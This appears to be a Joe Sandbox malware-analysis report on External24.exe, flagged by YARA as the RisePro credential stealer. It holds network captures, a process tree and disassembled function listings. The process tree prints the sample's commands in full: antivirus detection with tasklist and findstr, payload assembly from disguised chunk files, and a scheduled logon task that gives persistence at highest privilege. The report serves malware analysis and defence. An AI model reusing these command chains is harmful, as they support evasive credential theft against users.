2024-06-28 17:50:56 UTC	59	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-06-28 17:50:56 UTC	513	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Fri, 28 Jun 2024 17:50:56 GMT content-type: application/json; charset=utf-8 Content-Length: 319 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 1 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-06-28 17:50:56 UTC	319	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	55334	34.117.186.192	443	2304	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Timestamp	Bytes transferred	Direction	Data
2024-06-28 17:53:16 UTC	236	OUT	GET /widget/demo/8.46.123.33 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-06-28 17:53:16 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Fri, 28 Jun 2024 17:53:16 GMT content-type: application/json; charset=utf-8 Content-Length: 1025 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-06-28 17:53:16 UTC	876	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
2024-06-28 17:53:16 UTC	149	IN	Data Raw: 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 61 75 70 2e 6c 75 6d 65 6e 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 65 6e 74 75 72 79 6c 69 6e 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d Data Ascii: email": "abuse@aup.lumen.com", "name": "Centurylink Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	55335	172.67.75.166	443	2304	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Timestamp	Bytes transferred	Direction	Data
2024-06-28 17:53:17 UTC	260	OUT	GET /demo/home.php?s=8.46.123.33 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-06-28 17:53:17 UTC	659	IN	HTTP/1.1 200 OK Date: Fri, 28 Jun 2024 17:53:17 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC4673A0:F822_93878F2E:0050_667EF88D_1652CAF5:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bpVHR1RIEtI7a3vtcJ2ymhgz%2FoXN4jS%2BN%2BfGm9Jew9H6%2FARZrJ6ckvw5O6BtL9h0Wc6kGyIztWyr0DIYsKIKkk5VgsyqkEj6C7tfjRCVRl2QOkdJFG%2FP3QcSpQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89af89148fbf19e7-EWR alt-svc: h3=":443"; ma=86400
2024-06-28 17:53:17 UTC	673	IN	Data Raw: 32 39 61 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 69 70 41 64 64 72 65 73 73 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 73 45 75 4d 65 6d 62 65 72 22 3a 66 61 6c 73 65 2c 22 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 63 75 72 72 65 6e 63 79 4e 61 6d 65 22 3a 22 44 6f 6c 6c 61 72 22 2c 22 70 68 6f 6e 65 50 72 65 66 69 78 22 3a 22 31 22 2c 22 6c 61 6e 67 75 61 67 65 73 22 3a 5b Data Ascii: 29a{"status":"ok","demoInfo":{"ipAddress":"8.46.123.33","continentCode":"NA","continentName":"North America","countryCode":"US","countryName":"United States","isEuMember":false,"currencyCode":"USD","currencyName":"Dollar","phonePrefix":"1","languages":[
2024-06-28 17:53:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	13:51:01
Start date:	28/06/2024
Path:	C:\Users\user\Desktop\External24.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\External24.exe"
Imagebase:	0x400000
File size:	2'479'935 bytes
MD5 hash:	E8AF10713A9E8EE414A1A0865C2379F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:51:02
Start date:	28/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Forgot Forgot.cmd & Forgot.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:51:02
Start date:	28/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:51:02
Start date:	28/06/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xa40000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:51:02
Start date:	28/06/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa.exe opssvc.exe"
Imagebase:	0x150000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:51:04
Start date:	28/06/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xa40000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:51:04
Start date:	28/06/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Imagebase:	0x150000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:51:04
Start date:	28/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 292668
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:51:04
Start date:	28/06/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "towersallowancemeaninghelp" Wine
Imagebase:	0x150000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:51:04
Start date:	28/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b Therefore + Physical + Inflation + Inspections + Sharon + Lung + Appearance + Warming + Army + Latinas + Anytime + Wiley + Zoning + Cincinnati + Accidents + Helena 292668\r
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:51:04
Start date:	28/06/2024
Path:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
Wow64 process (32bit):	true
Commandline:	292668\Lawyers.pif 292668\r
Imagebase:	0x660000
File size:	937'776 bytes
MD5 hash:	B06E67F9767E5023892D9698703AD098
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:51:04
Start date:	28/06/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 15
Imagebase:	0x1d0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:51:06
Start date:	28/06/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "PixelFlow" /tr "wscript //B 'C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js'" /sc onlogon /F /RL HIGHEST
Imagebase:	0xbf0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:51:06
Start date:	28/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:51:07
Start date:	28/06/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js"
Imagebase:	0x7ff7a0d10000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:51:07
Start date:	28/06/2024
Path:	C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif" "C:\Users\user\AppData\Local\PixelFlow Creations\m"
Imagebase:	0x600000
File size:	937'776 bytes
MD5 hash:	B06E67F9767E5023892D9698703AD098
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:53:05
Start date:	28/06/2024
Path:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
Imagebase:	0x660000
File size:	937'776 bytes
MD5 hash:	B06E67F9767E5023892D9698703AD098
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000015.00000003.3035585776.00000000058AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.5%
Total number of Nodes:	1481
Total number of Limit Nodes:	31

Executed Functions

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
OleUninitialize.OLE32(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

~nsu.tmp, xrefs: 00403B23
SeShutdownPrivilege, xrefs: 00403C42
_?=, xrefs: 00403A90
NCRC, xrefs: 004039A8
/D=, xrefs: 004039D2
NSIS Error, xrefs: 0040390E
Error launching installer, xrefs: 00403AA9
\Temp, xrefs: 00403A47

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Rename on reboot: %s, xrefs: 00401943
Rename failed: %s, xrefs: 0040194B
CreateDirectory: "%s" (%d), xrefs: 004017BF
detailprint: %s, xrefs: 00401679
Aborting: "%s", xrefs: 0040161D
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
SetFileAttributes: "%s":%08X, xrefs: 0040177B
BringToFront, xrefs: 004016BD
Sleep(%d), xrefs: 0040169D
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
CreateDirectory: "%s" created, xrefs: 00401849
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Jump: %d, xrefs: 00401602
SetFileAttributes failed., xrefs: 004017A1
Call: %d, xrefs: 0040165A
Rename: %s, xrefs: 004018F8

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: 4d9a282c10645ff3b2b9757ab5ef7f4906a2cab9afb1e7538d0793e757964645
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: 4d9a282c10645ff3b2b9757ab5ef7f4906a2cab9afb1e7538d0793e757964645
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
